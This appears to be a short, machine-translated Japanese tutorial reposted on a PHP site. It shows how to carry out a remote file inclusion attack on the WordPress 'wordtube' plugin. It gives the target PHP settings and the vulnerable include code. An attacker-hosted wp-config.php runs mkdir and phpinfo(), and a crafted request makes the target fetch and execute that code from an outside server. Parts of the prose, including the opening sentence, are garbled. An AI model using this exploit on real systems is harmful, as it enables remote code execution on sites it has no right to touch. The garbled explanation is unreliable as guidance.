ホームページ  >  記事  >  バックエンド開発  >  リモートインクルージョン攻撃を実装するために一部の PHP 設定を変更する

リモートインクルージョン攻撃を実装するために一部の PHP 設定を変更する

WBOY
WBOYオリジナル
2016-06-23 14:37:31990ブラウズ

hugging bugging中に、display_errors = onでdisplay_errors =をオンにすることができます。2。ターゲットマシンの使用には、ターゲットマシンの構成が含まれます。

c )allow_url_include = On

このようなターゲットは攻撃される可能性があります

簡単なサーバーを自分で構築し、Apache + php で十分です

httpd.conf を修正し、攻撃側でコードが実行されるのを避けるためにサフィックスを php に変更します,

#AddType application/x-httpd-php .php .html .htm

脆弱性コードに基づいて対応する環境を生成します。例:

if (!$_POST) $wppath=$_GET['wpPATH' ];

else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');

アクセス可能なフォルダーを作成できます。 、すべての許可を拒否します、

次に、その中に新しい wp-config.php を作成します

<?php        mkdir('c:\exploit');        phpinfo();        exit;?>

~それからリクエストするだけです

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH =http ://10.67.1.30/bad_guy

これがレンダリングです:

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。